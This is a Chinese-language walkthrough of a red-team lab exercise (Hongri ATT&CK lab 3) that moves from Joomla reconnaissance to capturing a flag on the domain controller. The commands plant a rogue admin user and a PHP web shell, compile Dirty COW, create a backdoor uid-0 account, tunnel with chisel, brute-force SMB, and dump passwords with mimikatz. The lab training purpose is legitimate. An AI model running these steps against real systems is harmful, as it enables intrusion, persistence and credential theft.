ATT&CK 实战（三）

---

一、环境搭建

1.环境搭建测试

红日靶场地址

1.1 网络所示

目标：域控中存在一份重要文件。

本次环境为黑盒测试，不提供虚拟机账号密码。

2.信息收集

2.1 CMS识别

python3 cmseek.py -u http://192.168.134.130/

2.2 端口扫描

nmap -A -sV 192.168.134.130

2.3 目录探测

DirBuster目录探测

后台地址：http://192.168.134.130/administrator/

二、漏洞探测与提权

1、漏洞利用

1.1 从信息泄露到登录后台

cmseek扫描到一个配置文件http://192.168.134.130/configuration.php~，尝试访问。

尝试连接mysql

Joomla后台密码为MD5加密，破解代价很大，尝试重置管理员密码，附：如何恢复或重置管理员密码？

MySQL [joomla]> INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

MySQL [joomla]> INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

登录后台

1.2 Joomla远程命令执行

进入extensions -> templates -> templates -> beez3 -> new file，新建文件123.php。

URL：http://192.168.134.130/templates/beez3/123.php

冰蝎连接

2、继续收集信息

发现有可用的账号密码：wwwuser/wwwuser_123Aqx

尝试登录后继续收集信息

3、提权及权限维持

## 脏牛提权
gcc -pthread dirty.c -o dirty -lcrypt 
./dirty godunt123

创建后门账号godunt

useradd -p `openssl passwd -1 -salt 'salt' 123456` godunt123 -o -u 0 -g root -G root -s /bin/bash -d /home/mysqld

三、内网渗透

1、内网主机探测

[firefart@localhost tmp]# for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

2、构建通道

1.1 代理转发

[firefart@localhost ~]# ./chisel server -p 1080 --socks5

root@kali:~/05_Channel_construction/chisel_1.7.6# ./chisel client 192.168.134.130:1080 socks

修改/etc/proxychains.conf 。

3、内网扫描

3.1 系统信息

我们可以利用Metasploit 的 auxiliary/scanner/smb/smb_version获取一些系统信息。

结果如下：

3.2 端口信息

root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.10
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.20
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.30
## 开放53端口，很有可能是域控

3.3 漏洞信息

三台主机都开启了445端口，测试下MS17-010，利用auxiliary/scanner/smb/smb_ms17_010。

3.4 密码爆破

尝试爆破administrator 的密码，利用auxiliary/scanner/smb/smb_login 模块配合自己收藏的字典。

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30 
msf6 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/11_password_dic/PasswordDic-master/2021_top100.txt
msf6 auxiliary(scanner/smb/smb_login) > set threads 20
msf6 auxiliary(scanner/smb/smb_login) > exploit

4、横向移动

4.1 wmiexec

使用 wmiexec 获取域成员主机（192.168.93.20/192.168.93.30）权限。

4.2 获取主机凭证

上传mimikatz.exe 到192.168.93.20。

root@kali:~# proxychains smbclient //192.168.93.20/C$ -U administrator
Enter: 123qwe!ASD

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

获得域成员administrator/zxcASDqw123!!的密码。

5、域渗透

5.1 IPC$

C:\>net use \\192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator   
#系统默认路径c:\windows\下
C:\>dir \\192.168.93.10\C$\users\administrator\Documents
C:\>type \\192.168.93.10\C$\users\administrator\Documents\flag.txt

得到Flag！

##跟着思路学习复现，才会有收获。